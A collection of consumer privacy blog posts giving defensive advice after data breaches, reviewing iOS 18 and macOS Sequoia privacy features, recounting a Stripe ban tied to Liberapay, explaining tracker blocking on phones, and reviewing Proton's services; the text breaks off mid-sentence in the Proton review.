![Data Breach Aftermath-0001](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/data-breach-aftermath-0001.webp) # 1: What Data Was Exposed? First, you need to understand what data was exposed, this is crucial for your next steps to assess the real risks you’re up against. **Start by making a list of data points that were *definitely* exposed, and then ones that *may* have been exposed.** To figure this out, start with official announcements made by the breached company. For example, if you were notified by [Ticketmaster](https://help.ticketmaster.com/hc/en-us/articles/26110487861137-Ticketmaster-Data-Security-Incident) regarding their data breach, you would include the following data points: *“phone number, encrypted credit card information as well as some other personal information”* ![Data Breach Aftermath-0004](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/data-breach-aftermath-0004.webp) What you’d write for 'definitely' impacted is: - phone number - credit card information And for 'maybe' you'd write: - email - first & last name - billing address Generally, the most common data points you’ll find will include: - Email - Password - Phone number - Home Address - SSN - Payment info Now that you have a starting point with official announcements, what we want to do is cross-reference this information with trustworthy tools. I recommend using [haveibeenpwned](https://haveibeenpwned.com/) to check your email for data breaches and setting up notifications for your core emails. ![Screenshot 2024-09-27 at 15](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/30.webp) You also want to keep up with coverage of your data breach as well. [Not too long ago](https://www.forbes.com/sites/kellyphillipserb/2024/08/23/what-you-need-to-know-and-do-about-the-massive-social-security-numbers-breach/) millions of people had their social security numbers leaked, and [pentester](https://npd.pentester.com/) was the site that you could use to see if your SSN was part of the breach. But not every breach follows the same script, so I’d suggest having a way to keep up with the latest news and updates. Shameless plug: I cohost a weekly podcast which begins with a data breach section where we do all this work for you. [**Check out Surveillance Report to learn more!**](https://surveillancereport.tech/) --- ![Data Breach Aftermath-0006](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/data-breach-aftermath-0006.webp) # 2: Remediation for exposed data Now that you have a list of exposed data points, we can finally take action! Generally speaking: SSNs, passwords, and payment information are the most sensitive—so you’ll want to prioritize these breached data points and cross-reference those with your list you made from the first section. From there, take care of the remaining data points from the **definitely** and **maybe** sections respectively to decrease your likelihood of identity theft, fraud, and other malicious activity. ![Data Breach Aftermath-0005](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/data-breach-aftermath-0005.webp) For example, with the Ticketmaster data breach from last section...I would go in the following order: - payment information - phone number - email - home address If an SSN was part of the breach, it would be the first thing you deal with. Prioritize accordingly so you don't do too much at once! Now that you have a list of data points to target, I'm going to walk through remediation steps for every major data point. You do **not** need to follow every step, but I will lay out all the options you have to keep the level of safety flexible. To be thorough, you should always contact the breached provider to see if they have more specific advice for you as well. ## 🔐 Breached Passwords (Easy to Hard) 1. The first critical thing you need to do is update the password on the breached account itself to prevent unauthorized access, very simple starting point. 2. From there, make sure you’re not re-using your breached password. A tactic hackers use is called *credential stuffing*, where they take passwords from one data breach and try them on your other accounts. Myself and many security experts are proponents of [safe password managers.](https://www.techlore.tech/resources#password-managers) I’ve been using [Proton Pass](https://youtu.be/CLwg552vhlM) and loving it. If you don’t like password managers, just make sure you have a system for saving secure and unique passwords. 3. The final step to maximize protection is to enable multifactor authentication for your breached account and other sensitive accounts like your email. [TOTP](https://www.youtube.com/watch?v=iXSyxm9jmmo) is a more secure multifactor method where you scan a QR code for temporary access tokens. If you want to take it to the next level, consider [hardware keys](https://www.youtube.com/watch?v=8Y77o23q%5Ftg) for accounts that support it! The more services you enable multifactor authentication for the better, but at least try to cover your most sensitive accounts. ## 📥 Breached Emails (Easy to Hard) 1. Make sure the security for your breached account is safe. Make sure that you update your password and enable any multifactor authentication security options on the breached account. Go back to the passwords section for password security advice. 2. Make sure you secure your email account itself. Email accounts are valuable because they’re a central location for many of your sensitive accounts. To do this, make sure you’re not re-using passwords and make sure you’re using multifactor authentication on your email account. 3. Be cautious with any phishing attempts, when someone spoofs a website to trick you into giving them your credentials. Now that your email is public knowledge you may receive more of these attempts! 4. The fourth thing gets more advanced and isn’t for everybody, but it’s to compartmentalize emails for different things—the extent of which varies. Some people prefer a minimal approach where they have one email for their most sensitive accounts, a second email for the rest of their accounts, and a final email for spam and/or communication. This bucket approach is a nice convenient way to add a layer of separation between your accounts. Not only will a data breach not leak into your other email accounts, but you can properly prioritize security protocols by implementing the strictest security protocols on your more important email account(s). 5. Some people like myself prefer to ditch the bucket method and opt to use a unique email for *every* service. This might seem like a lot of work, but there are aliasing services that make this easy. I’m using Proton Pass which auto generates aliases that forward to my normal email inbox. With this workflow, if an email is ever breached or someone shares it with a third party, you know exactly who is responsible since the email is tied to only one service. Some providers that offer aliasing include: - Proton Pass - Simple Login - Addy.io - Startmail ## 📱 Breached Phone Numbers (Easy to Hard) 1. The first and most important thing is to be aware of phishing attacks, similar to the email section. Now that hackers know your phone number, you may receive texts or calls with the goal of getting more information from you. Be alert! 2. I’d suggest logging in to your phone’s cellular account and making sure you utilize every security option available to you. Go back to the passwords section regarding secure passwords and multifactor authentication options. 3. From here I recommend calling your cell provider to ask if they offer additional protections against sim swap attacks. These are when somebody impersonates you and convinces your cell company to re-issue your number to them, allowing them to intercept all of your messages and calls. Call your cell provider and see what they can do to prevent this! 4. Another small but minor step is to avoid number-based accounts when you can. Many providers allow you to use an email instead of a phone number. It’s *much* easier to change emails in the event of a breach! 5. From here phone numbers are going to look a lot like the email section of this video, using buckets to compartmentalize numbers for different things. The general buckets for most people will be: - A phone number for communicating with friends and family - A phone number for accounts - A spam number Services like Google Voice and MySudo can make this much easier and affordable! ## 👤 Breached Social Security Number (Easy to Hard) 1. What you can do with your SSN is both free and takes you a long way, without ever needing a credit monitoring service. **First, freeze your credit.** This stops anyone from opening a new line of credit under your name, meaning you will need to actively remove the credit freeze next time you want to open a new line of credit. It has no drawbacks, it has no impacts on your credit score, and all it does is keep you safe. To do this just open an account with all three credit bureaus and place a freeze. All three have temporary credit lifts for when you want to apply for new credit, so you can temporarily lift the freeze for however much time you need it lifted. **Everyone should do this, it’s the most important thing in this blog.** 2. From there, set up alerts on your credit file, make sure it’s always you who is responsible for anything happening. 3. I’d recommend planting your flag and setting up official government accounts that use your SSN so you can claim the accounts before a hacker does. An example of this is the [SSA](https://www.ssa.gov/) website. 4. Many people ask us about credit monitoring services...I'm generally opposed to them. They don’t tend to do anything that services like [haveibeenpwned](https://haveibeenpwned.com/) and paying attention to your credit accounts can’t do. Credit monitoring services at best just take your money, and at worst expose you to additional risks like [their own data breaches.](https://www.twingate.com/blog/tips/Lifelock-data-breach) The only two benefits a credit monitoring service can provide that you can’t get yourself are a dedicated support agent if you need help in an emergency, and some offer liability insurance if you think that they’ll pay you in a situation where you experience financial loss. But neither of these should happen in the first place if you follow the steps in this blog. ## 💰 Breached Payment Information (Easy to Hard) 1. Payment information is pretty important because well…it’ll cost you. The first thing I recommend is trying to avoid debit cards online when possible. Credit cards make it a lot easier to dispute and reverse transactions in a bad situation. 2. From there, services like Apple Pay and Google Pay do a single layer of obscurity with your card number, which helps with data breaches since providers don't get access to your original card numbers. 3. Be cautious with who you give your payment information to in the first place. Make sure websites are reputable, and if you have second guesses: use gift cards, either native gift cards like an Amazon gift card, or you can get a non-reloadable prepaid visa gift card to use on sites you have less faith in. Most of these can be purchased at your local convenience store. 4. Payment processors like PayPal are also great when you don’t trust the site itself to handle your card information. 5. Finally, what I do is I use privacy.com. Privacy.com let’s you generate dedicated cards as well as burner cards for every site. Use them on as many sites as possible so any data breach keeps your payment information isolated to that one site. ## 🏠 Breached Home Address (Easy to Hard) A breached home address is a tricky one. Fortunately, most people don’t need to be *super* concerned with a breached home address unless they’re a person of interest. Most hackers are concerned with easy targets like people reusing passwords, they're not looking to physically go to your home. With that said: 1. Keep an eye on online directories and people-searching sites to make sure your home address stays off of them. We’ll have a guide sometime in the future on how to opt out of data search websites, so stay subscribed to catch that. 2. Be cautious of suspicious mail that like phishing attacks online are trying to get sensitive information from you. 3. From there, I suggest basic home security. Like improving your locks, setting up alarms on your windows, being careful with package thefts, setting up cameras, and doing whatever you can to improve the security of your home. 4. Finally, I recommend setting up a mailbox that’s away from your home that you use for anything that doesn’t require a residential address. Personally I go on Yelp and type in *private mailbox* in my area. This gives me results for local mailboxes that I can use for shipping things nearby to keep my address off of substantially more websites. --- ![Data Breach Aftermath-0007](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/data-breach-aftermath-0007.webp) # 3: Prevention With all of that out of the way, I wanted to consolidate **10 prevention steps** everyone should do to prevent data breaches from happening in the first place. And if they do happen, they'll cause a *lot* less damage. **Refer back to Part 2 of this blog for more specific information of each step:** 1. Freeze and monitor your credit, it’s the most important thing in this blog. 2. Use a password manager or another method of securely storing unique passwords for each website 3. Utilize multifactor authentication as often as possible, opting for more secure versions of multifactor authentication like TOTP or security keys instead of your phone number. 4. Close accounts you no longer use, digital minimalism goes a long way and the less data and accounts you own, the better. 5. On this note, use services that go out of their way to collect less data about you. Less data collected is less data to secure. Be wary of people asking for too much information. 6. For emails, I recommend having multiple emails for different things. On a basic level, at least have an email for accounts separate from spam and the email you use for communication. But ideally you’re using an email aliasing service like the ones I covered earlier in the blog. Also make sure to lock down your email and keep it secure. 7. Similarly, your phone number is something you should try to compartmentalize across a few different numbers. We discussed strategies for doing this earlier, and you also want to make sure your phone number is locked down. 8. Make sure you’re being careful with your payment information online. Opt to use credit cards, Apple Pay, PayPal, gift cards, or ideally aliasing services like privacy.com to protect your payment information as best you can. 9. Make sure all of your devices and software run the latest software with security patches. 10. and finally……**KEEP BACKUPS.** In a worst-case scenario, someone can lock you out of sensitive data or even infect you with ransomware. Keep safe backups. --- # Summary With all of that said, I hope that you feel empowered. This is all a spectrum, so if you only take care of the basics—that’s okay. While there’s always more you can do, my goal is for you to find the best compromise between safety and convenience. The work you put in today can save yourself literally months of headache in the future, so don’t underestimate how much your work right now can pay off. You being here puts you well ahead of the average person, and most people are looking for easy targets. Don’t be an easy target, make positive steps, and go sleep well tonight knowing you've taken some control of your digital life. ### All New Privacy & Security Features in iOS 18 & MacOS Sequoia URL: https://techlore.tech/all-new-privacy-security-features-in-ios-18-macos-sequoia/ Last updated: 2025-11-25T02:38:15.000Z # iOS 18 📱 ## Locking Apps Many privacy-focused applications like Signal and Proton Mail can already require additional authentication when being opened. Apple has now baked this functionality natively into iOS 18\. This means even if someone has your unlocked device, they'll need to bypass authentication requirements a second time to open each locked application. ![signal-2024-09-26-164026_002](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/signal-2024-09-26-164026_002.jpeg) ### To enable this: - Hold down on any application - Select *'Require Face ID'* ### Limitations: 1. Unlike other versions of this feature we find in Signal and Proton Mail where you can select a time window before requiring authentication again, this feature lacks that ability. It will prompt each time! 2. There's no fallback to your device's password. Signal and Proton Mail both have password fallbacks in the event you can't authenticate with your face, this feature lacks that. 3. One of our Signal group members who doesn't use Face ID let me know that this feature *requires* Face ID. If you don't use Touch ID, you cannot use the feature at all! ### My Take While this is a fantastic tool and I'm happy to see it...I think the overlap of sensitive applications that can benefit from this feature but didn't already offer it is fairly slim. Many banking apps, Signal, Proton Mail, Tuta, and other apps that require privacy already included this ability, and they still offer more flexibility with this feature than what Apple natively offers. What this *is* good for is the random app that stores sensitive data and didn't already include a feature like this. Maybe if Apple introduces more flexibility for this feature, then developers will push users to use the native version instead of developing their own. --- ## Hiding Apps You can now hide applications from the homescreen and app drawer. Pretty self-explanatory! Hidden apps won't be easily discoverable except in a few places like your settings. To access the app once it's hidden, you just go to your app drawer and scroll to the bottom where you'll see a *'Hidden'* section. ![signal-2024-09-26-165745_002](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/signal-2024-09-26-165745_002.jpeg) ### To enable this: - Follow the same instructions as locking an app, but instead of selecting *'Require Face ID'*, select *'Hide and Require Face ID'* ### Limitations: - This is very all-or-nothing. If an app is hidden, you will not receive notifications, calls, or alerts for the app. ### My Take I can't figure out where I would use or recommend this feature. The only scenario that comes to mind is if you have an app you don't want to be discovered by someone who has frequent access to your phone. But as we covered, the app can still be discovered from your settings. And guess what? Apple doesn't allow you to lock the settings app. While this is a cool feature and I appreciate it existing. I can't help but feel that separate user accounts or work profiles found on Android devices is simply an upgraded version of a similar concept. I'll continue reflecting on this feature, and if you have suggestions on how to use it—send them to me! --- ## Passwords Apple now has a real password manager! This will include all of your keychain passwords and a few extra things, but in a dedicated password app. ![signal-2024-09-26-171633_002](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/signal-2024-09-26-171633_002.png) If you are expecting some of your favorite features from one of our [commonly used](https://www.techlore.tech/resources#password-managers) password managers, you'll still be disappointed. However, this seems like a great first step in Apple committing to one day offering a legit password manager that does more than what your browser can do. One of my favorite features covered by Josh from All Things Secured [here](https://youtu.be/bJtYVopkeKY) is this new app allows you to share WiFi credentials without needing to share the password itself! They just scan the QR code and their device joins the network, but the password is never shared. ### My take This is a welcome change and a good direction for Apple. It shows long term commitment to building a proper password manager. But, I'm more excited about the potential for this app than what the app offers in its current state. It's fairly locked down to Apple's ecosystem with limited options for easily migrating to alternative platforms. It also has no Android or Linux support with iffy Windows support from what I can tell. Apple's new Passwords app is another kick in the gut for anyone who (*gasp*) includes a non-Apple device anywhere in their workflow. If you're not already using a password manager, please use a [better one](https://www.techlore.tech/resources#password-managers) so you aren't locked into Apple's walled garden. If you're already in the garden, then you now have a nicer app to use! --- ## Contact Privacy Permission Previously you could choose to grant apps either your entire contact list, or none of it. Apple is making this more granular in iOS 18 by giving you the ability to select only specific contacts to share with each application. ![signal-2024-09-26-173433_002](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/signal-2024-09-26-173433_002.jpeg) ### To enable: - Go to Settings > Privacy & Security. - Tap Contacts, then tap the app. - Choose how much access to your contacts you’re giving the app - Select or deselect individual contacts, then tap Done. ### My take This is great for situations where you have a single person using a messenger like Telegram or WhatsApp. Now, you can still have these apps manage a select number of contacts tied to that platform without needing access to other contacts. What I wish Apple would do to expand the usability of this feature is to add contact groups/buckets. As it stands, you have to manually select contacts on a per-app basis, meaning you have to redo your work on every app. I'd love to see an option to create contact buckets, like a 'family' bucket, so you can continually choose to share a specific group with multiple apps. # MacOS Sequoia 💻 ## iPhone Mirroring & Notifications While this may not seem like a privacy feature per se, it can be utilized for some clever workflows that were never possible before! ![mirror](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/mirror.png) As you can see above, you can now access and use your iPhone directly from your Mac to do cool things like [access our Signal group from your phone.](https://discuss.techlore.tech/t/signal-usernames-are-here-join-our-signal-group-techlore/7640) What this means is: - You now have the option to use the more robust sandboxing of your iOS applications without needing to use desktop counterparts - You now have the option to avoid syncing data between devices through centralized servers As I said, this is *not* a privacy feature. But, I already know our team member Jonah is planning to ditch Signal for desktop in favor for only using Signal on his iPhone, as now he can access it from his computer. This means he gets a more secure experience, and it also means he can save on sync times as Signal desktop won't need to sync every time it opens. There are many other hypothetical situations where you may able to use iPhone mirroring in place of an otherwise insecure desktop client, or a situation where a provider doesn't provide E2EE syncing. ### My take: Very underrated tool that I'm sure many people will find interesting use-cases for! One workflow that may speak to many people is TOTP. It's generally best practice to keep TOTP codes on one device, and now you can do that with iPhone mirroring without needing to sync your codes between devices. If you use Ente Auth, just use it offline without an Ente account and use iPhone mirroring to access your codes on MacOS even if your iPhone is in the other room. Huge! *Pro tip: Use the keyboard shortcuts in the 'view' menu to quickly access spotlight and the homescreen of your iPhone.* My only complaints with this feature: 1. I wish it was better integrated into MacOS. Imagine if spotlight on MacOS could open an iOS app and automatically open iPhone mirroring with the respective app. 2. While it's best for security, the connection timeout is fairly short, so this isn't as smooth as you may envision it to be. You can't just leave your iPhone open on your second monitor for hours on end. After just a few minutes it'll pause the connection and require authentication to access your phone again. 3. The window is too small. Even if you increase the window size in the view menu, you still don't fill the full vertical space of your display. I wish this scaled up more. --- ## Passwords Remember the passwords app from the iOS section? Apple released it for MacOS as well! It syncs via iCloud and my thoughts on it are exactly the same as the iOS section. ![passwords](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/passwords.png) --- ## Gatekeeper Changes This is a nerdier and more technical update, but Apple made some minor changes to how it verifies the security of applications you open. I wasn't aware of this, but previously you were able to open applications that were not approved by gatekeeper by simply right clicking the application, and clicking 'open' from the finder menu instead of double clicking the application as you normally would. I'm already used to having to go to System Preferences to force-open an app when gatekeeper blocks it, but now that's your only option. If you knew about this workaround, that's a bummer. If you're like me and you never knew, well that's it! I guess now everyone has to get used to opening the system preferences to allow apps that gatekeeper doesn't like. --- ## Permissions that are pissing people off MacOS is now giving you popup notifications every month if an app has permission to record your screen. It will do the same for any apps that require local network access. People are pretty pissed about this one, since most apps that have this permission were granted explicit permission to access screen content. I am not sure what the inherent security benefit is to this in most situations, but I guess you'll need to get used to it. --- ## MAC Address Randomization MAC randomization is making a comeback! to set this up go to System Settings > Wi-Fi > Details > Private Wi-Fi address ![Screenshot 2024-09-26 at 18](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/17-1.png) I'd suggest using a fixed address for more established networks you trust, and using rotating addresses for networks you have less faith in. My only issue with this feature is there's no global default. You'll need to do this for every network you join and I don't believe there's a way to set a default behavior when you join. From what I can tell, when you join a new network it will always default to 'Fixed'. Not sure how I feel about this if I'm understanding the feature correctly. --- # Summary Definitely some nice changes, though overall I can't say there's anything groundbreaking with these new updates. What I'd love to see are: - Improvements to lockdown mode, particularly the ability to exclude web apps in Safari for MacOS - Apple committing to more platforms than just iOS, MacOS, and Windows for its new Password app. (iPadOS is *not* a different OS from iOS no matter how much Apple claims it to be! So I will not include it in the list of supported operating systems) Apple seems to acknowledge that Android exists with Apple Music, but not for its Passwords app?! - I'd love to see improvements to iPhone mirroring so more workflows can exist. Like a longer timeout, and deeper integrations with MacOS. - Apple has yet to fix it's bizarre issue of VPNs being [completely unreliable](https://www.ivpn.net/blog/removal-of-kill-switch-from-our-ios-app-due-to-apple-ip-leak-issue/) on iOS. At this point I can't even say using a VPN on iOS is reliable enough to safely protect your IP address. The worst part is Apple seems committed to calling this intended behavior. I don't understand how a company dedicated to releasing a great feature like Lockdown mode can completely blow over the importance of safely protecting someone's IP address. - I would love love love to see user accounts, work profiles, and other features to enable users to use multiple versions of the same app on their phones. No bad moves, but no great ones either. Minor updates across the board, but welcome nonetheless. About what everyone is saying about the new iPhones. ### Is Stripe Killing Liberapay? URL: https://techlore.tech/is-stripe-killing-liberapay/ Last updated: 2025-11-25T03:27:51.000Z [Liberapay](https://liberapay.com/) is a support method we've made available for both [Techlore](https://liberapay.com/Techlore/) & [Surveillance Report](https://liberapay.com/surveillancereport/) supporters to contribute to our causes. What's special about Liberapay is it's open source, more privacy-respecting than Patreon, and far more transparent. But, nice things can't always last. ![stripe](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/stripe.png) ## What happened? We have two Liberapay accounts, one for Techlore and one for Surveillance Report. This is done to keep finances separate between the two. Liberapay offers two payment processors: PayPal & Stripe. Stripe is much preferred as there are fewer fees and it integrates far better with Liberapay—even Liberapay encourages Stripe: ![Screenshot 2024-09-15 at 11](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/32.png) Previously, we only had one Stripe account we linked to both Liberapay accounts, where we manually calculated the difference from there. To streamline this, we created a new, dedicated Stripe account for Surveillance Report that we **only** linked to Liberapay. After receiving our first Liberapay payment, Stripe banned our new account: ![stripe](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/stripe.png) After investigating, Stripe is claiming that Liberapay is against their ToS for crowdfunding. We appealed and they rejected our appeal. ## Was this a one-off incident? The unfortunate thing is the [stux Mastodon server](https://mstdn.social/@stux/113141773033832135) had their Stripe account shut down too on the very day of writing this blog (They used Liberapay): ![Screenshot 2024-09-15 at 11](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/07.png) I don't know if they had the exact issue as we did, but it's eerily similar. Based on my understanding of Stripe's ToS, I don't *believe* Liberapay fully complies with their rules. (Hard to tell!) Their [restricted businesses list](https://stripe.com/legal/restricted-businesses) clearly outlines crowdfunding as a risky business, though it's unclear if it's officially banned on Stripe. But given Surveillance Report was banned, I have to assume it's a possibility. For context: many businesses, orgs, and individuals rely on Stripe for receiving their income! This is a *big* problem for anyone who has to make money online. For many platforms, Stripe is the default. There are a few possibilities for what's happening: - Liberapay alone is being picked up as a risky transaction from Stripe, so Stripe is occasionally banning accounts that accept funds through Liberapay - Stripe is getting more intense about their crowdfunding policies and banning accounts that use them for crowdfunding. - These are all coincidences. (....) ## Where is Liberapay?! Yes, Stripe is the problem here. But Liberapay shares some responsibility too. I reached out to their support almost 2 weeks ago regarding this (pretty serious!) issue. ![liberapay](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/liberapay.png) I have yet to receive a response. Given how heavily Liberapay pushes Stripe with no warnings of this happening, I feel they should be doing more to reassure people using their platform can do so safely. In the meantime, if you're a creator, org, or business using Stripe on Liberapay—do so at your own risk. Update: Turns out there's an [open GitHub issue](https://github.com/liberapay/liberapay.com/issues/1755) regarding this! If you have been impacted or have suggestions to make to the team I'm sure they'd be happy to hear! ## What's next? I've gone ahead and removed the Techlore Stripe from our Liberapay accounts as a precaution. We will no longer be linking Stripe accounts to Liberapay out of fear of getting these crucial accounts banned. Stripe allows the same business to have multiple accounts. PayPal doesn't allow this. And unfortunately, we are unable to link one PayPal account to multiple Liberapay profiles. So here's our solution: - The Techlore Liberapay is being retired and being transitioned to a similar offering we just created on our [forum!](https://discuss.techlore.tech/s) \- This is how you can officially become a Techlorian and gain access to exclusive communities like our Signal group! - We are using the one PayPal account for the Surveillance Report Liberapay, which will remain live but only with PayPal. We feel this is the community that relied the heaviest on Liberapay and we didn't want to take it away. --- Sorry about this. I go out of my way to try and make sure the boring admin stuff stays out of the public so we can just talk about the important stuff: digital rights. But sometimes our admin stuff is important, so I hope this was insightful. If anyone has any insight or feedback to give us, please contact us! Thanks for reading, and if you want to support Techlore the newest way to do so is by [becoming a Techlorian!](https://discuss.techlore.tech/s) ![Screenshot 2024-09-15 at 12](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore/14.png) ### Stop Apps From Spying on You: A Guide to Finding & Blocking Trackers URL: https://techlore.tech/thwart-trackers-uncovered-secrets-to-stopping-app-spies/ Last updated: 2025-11-25T04:22:45.000Z Many apps available for your phone have trackers: hidden software designed to collect data. These trackers are cross-referenced between your apps to build a comprehensive profile of who you are & what you do, all without your direct consent or control! This post will teach you how to find & stop trackers in your apps. ## Finding Trackers On Android, download the open source app Exodus from the Google Play Store or F-Droid. On first launch, it’ll display permissions of each app, revealing a plethora of unnecessary permissions (which you should disable if possible) - but also trackers. If you go to the ‘Trackers’ tab, it gives you a broad picture of everything on your device. Because your phone has unique identifiers that trackers utilize, having something like Google analytics present on 10 different apps means Google can correlate information between those apps to figure out exactly who you are on a deep level, and the same goes for any of the other trackers. On iOS, there’s no app like this - as apps can’t easily scan other apps in Exodus-fashion. Luckily, iOS apps are generally made by the same teams and the trackers are often available for both Android and iOS. So it’s generally safe to assume if Exodus shows trackers on its [website](https://exodus-privacy.eu.org/), then it’s likely iOS has similar ones. Additionally, iOS now includes a setting which allows you to view domains contacted by each application. (Settings > Privacy & Security > App Privacy Report) ### One important detail before we crush the trackers: All Exodus does is reveal the presence of trackers, which in almost all situations reflects if they’re used - but not always. For example, the Tor Browser shows 3 trackers, but they’re actually inherited from Firefox, and the Tor Browser disables them, so they’re never active. Similarly, some apps have options within them to disable analytics. (which may stop some trackers) With that said, it’s safe to assume for most applications that the presence of trackers is bad news for you. ## Stopping Trackers There’s no single method to stop all trackers unless you only download tracker-free apps. However, combining all the following techniques is going to give fantastic results: - First, more superficial stuff. Go into the settings of every app and opt-out/turn off anything you can. Some apps may respect these changes and disable certain trackers, and some won’t. Remember settings like ‘disabling analytics’ may only disable a single tracker, but not all. - On many Android devices, you can use a work profile with apps like [Shelter](https://f-droid.org/en/packages/net.typeblog.shelter/) which keep your applications separated, so it’s more challenging for separated apps with trackers to be correlated. You could also use separate user accounts using the native Android setting. This option doesn’t directly stop any trackers—it just compartmentalizes them, but it’s still a powerful tool for Android users. - On a similar note, if you’re privileged enough to have multiple devices at your disposal, there’s always the option to separate invasive applications across different devices. - Contact the support or development team for your app. Apps are hard to build, and many developers use frameworks and third-party SDKs that can include invasive elements like trackers. It’s possible the developer doesn’t even know about the trackers! - The obvious, yet less ideal option: simply uninstall an invasive application if you have no further use for it. I guarantee there’s at least one invasive app on your phone that you can comfortably remove with few repercussions. - For invasive applications where you aren’t picky about the app, but still need the use-case provided by the app, consider looking for [safer alternatives](https://alternativeto.net/). For example, if you’re using Spotify, consider looking for alternatives and seeing which alternatives are the most privacy-respecting. [(Hint: Apple Music was my top choice, which surprisingly works beautifully on Android as well!)](https://youtu.be/wrAdpoGbJd8) - Network Firewalls. Services like NextDNS and CONTROLD allow you to fine-tune which types of domains are allowed/blocked on your devices via DNS. I suggest you read my coverage of [NextDNS](https://dispatch.techlore.tech/p/using-a-custom-dns-nextdns-alongside) to see how powerful of a tool it is and how it’s a perfect tool for preventing your applications from contacting tracker domains. If you don’t want to go the custom DNS route, but you’re already using a VPN, many VPNs like Mullvad & IVPN already include native settings to prevent tracker/ad domains from being contacted. These may be less powerful than certain configurations on NextDNS, but they’ll still take care of the basics. - Local Firewalls. [Some custom Android ROMs](https://youtu.be/ujJciKxvn6g?t=729) have networking toggles to fully disable internet for apps that don’t need it. On a more universal note, apps like DuckDuckGo, Netguard & Trackercontrol for Android allow you to limit internet access and even block trackers. Lockdown and AdGuard are options for iOS, and Blokada is an option that works on both Android & iOS. If you’re more technical, you can use something like a Pi-hole. While firewalls are overall great, combining all techniques is going to give the best possible results: strategically deciding which apps to all-out remove and use alternatives for, utilizing user accounts if you can, using Firewalls, and contacting the support team with your concerns. Everything combined will give you a massive layer of control. With the trackers stopped - you should be aware this was just a small part of the privacy journey, so if you want to learn about all the ins & outs of your phone, your computer, your accounts, and more, I suggest looking into our [Go Incognito Course](https://techlore.tech/goincognito) to learn the ins & outs of privacy and security. ### Proton Privacy: A Review to Determine its Full Potential URL: https://techlore.tech/proton-privacy-a-review-to-determine-its-full-potential/ Last updated: 2025-11-25T04:31:21.000Z ## Introduction 📝 Proton is one of the largest privacy companies in the world with a central suite including email, VPN, drive storage, and calendar. In this review I’ll cover the privacy & security of Proton, what I love about each service, but also what drives me a little crazy about the ecosystem. ## Proton Mail 📧 ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716491956-0.webp) I’d argue Proton Mail is the most developed service. Against Gmail you’re getting a quality interface, mostly consistent between devices, several advanced features, and advanced search functionality. Desktop is web-based, likely similar to how most people use Gmail. iOS and Android have native apps that I think are overall solid. (though I have gripes I’ll cover soon) The free plan is generous, the UI is solid, there are attractive privacy & security features; and just to top it off, switching from Gmail is easy to do with Proton’s native features to migrate from Google. Despite the overall positivity, I have some gripes: - You have to use THEIR clients - unless: - You’re on desktop, and… - You pay Proton to use their bridge, which I don’t think should be paywalled. Without these two things, you’re locked into Proton’s clients. Yes, you’re limited to only their mobile clients. - Proton’s themes look great - but as someone who switches between light and dark theme automatically, it’s silly for Proton to not have a system theme option for desktop. - No email templates. Most emails we receive can be responded to with \~5 copy/paste templates, and it’s unfortunate to not have template functionality, especially when it’s offered by one of their competitors - Tutanota. - Their iPad app has no optimization for the iPadOS ecosystem, it’s just a blown up version of the iOS app. I’d argue it’s nicer to use the web client on an iPad than the actual app. - My final major complaint is how Proton Mail handles multiple accounts on web. To switch between accounts, you leave the main UI to enter the account switcher, then select a different account, which is inconvenient. All accounts should just be listed in one place like the mobile apps. It’s actually more convenient to play with the URL than to use the formal account switcher. Despite my complaints, I enjoy Proton Mail. It looks nice, it’s functional, and I think it’s pretty low sacrifice all things considered, which is impressive given there’s a lot going on behind the scenes to make this a private & secure experience - the extent of which we’ll cover soon. ## Proton VPN 🔐 ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716492048-0.webp) Alongside Proton Mail, there’s Proton VPN; we’ll keep this short because it’s just a VPN and there’s not much to cover. In our [VPN Toolkit](https://techlore.tech/vpn), it performs well, offering one of the most trustworthy VPNs on the market from a privacy & security standpoint. Usability-wise, the clients are okay, there’s no real custom DNS support for things like NextDNS, and I just generally feel like since they released WireGuard there’s been little evolution. It’s these reasons I probably wouldn’t go out of my way to buy Proton VPN; if you see me using it - it’s likely because I’m paying for the Proton ecosystem and just using the VPN to save money. I don’t find the user experience better than the [other VPNs](https://techlore.tech/resources) we suggest, all of which offer similar if not better privacy & security, with more attractive features, cheaper prices, better speeds, and better clients. The one selling point of Proton is the generous free plan, which is one of the only free VPNs we feel comfortable recommending. Regardless, it’s great to have access to this VPN if you’re already paying for the Proton ecosystem! ## Proton Drive 🗄️ ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716492134-0.jpg) Moving to Proton Drive, this seems great - as it presents itself as a perfect Google Drive replacement…but it’s not. It delivers on the privacy & security, but the usability is more comparable to an SD card online, than an actual cloud provider. Because: - There’s no collaboration or document editing, which is fine - but compared to Google Drive, that’s a huge loss. (In Proton’s defense, most cloud providers don’t offer this.) - No desktop clients, meaning you can’t directly sync with your local file system. Proton said there’d be desktop clients before 2023, but here we are several months into 2023 with nothing. - Proton advertises no max file sizes, but after extensive testing, this is not true. Why this happens is because web based applications have limitations, especially with a zero knowledge provider like Proton Drive that has to decrypt and encrypt every file. (especially on low power devices, which are a lot more common than people think) Even the browser you’re using can impact your ability to download/upload certain files. To do some quick testing, I uploaded a 1GB, 4GB, & 12GB file, and the 1GB file failed on Safari and Brave on an iPhone 13 mini (a modern high powered device) and the larger download failed on Firefox for Android. So Proton simply cannot guarantee no max file sizes for as long as people still try to use the web, there will be limitations as to what 